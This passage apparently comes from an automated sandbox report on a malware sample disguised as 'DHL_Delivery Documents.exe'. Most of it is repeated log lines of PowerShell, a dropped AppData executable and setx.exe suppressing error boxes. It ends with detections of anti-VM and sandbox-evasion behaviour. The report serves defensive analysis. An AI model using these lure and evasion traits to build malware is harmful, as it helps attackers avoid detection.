Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: YybGLWQSx.exe PID: 7204, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Memory allocated: 2BD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Memory allocated: 2E30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Memory allocated: 2C70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Memory allocated: 6450000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Memory allocated: 7450000 memory reserve | memory write watch Jump to behavior
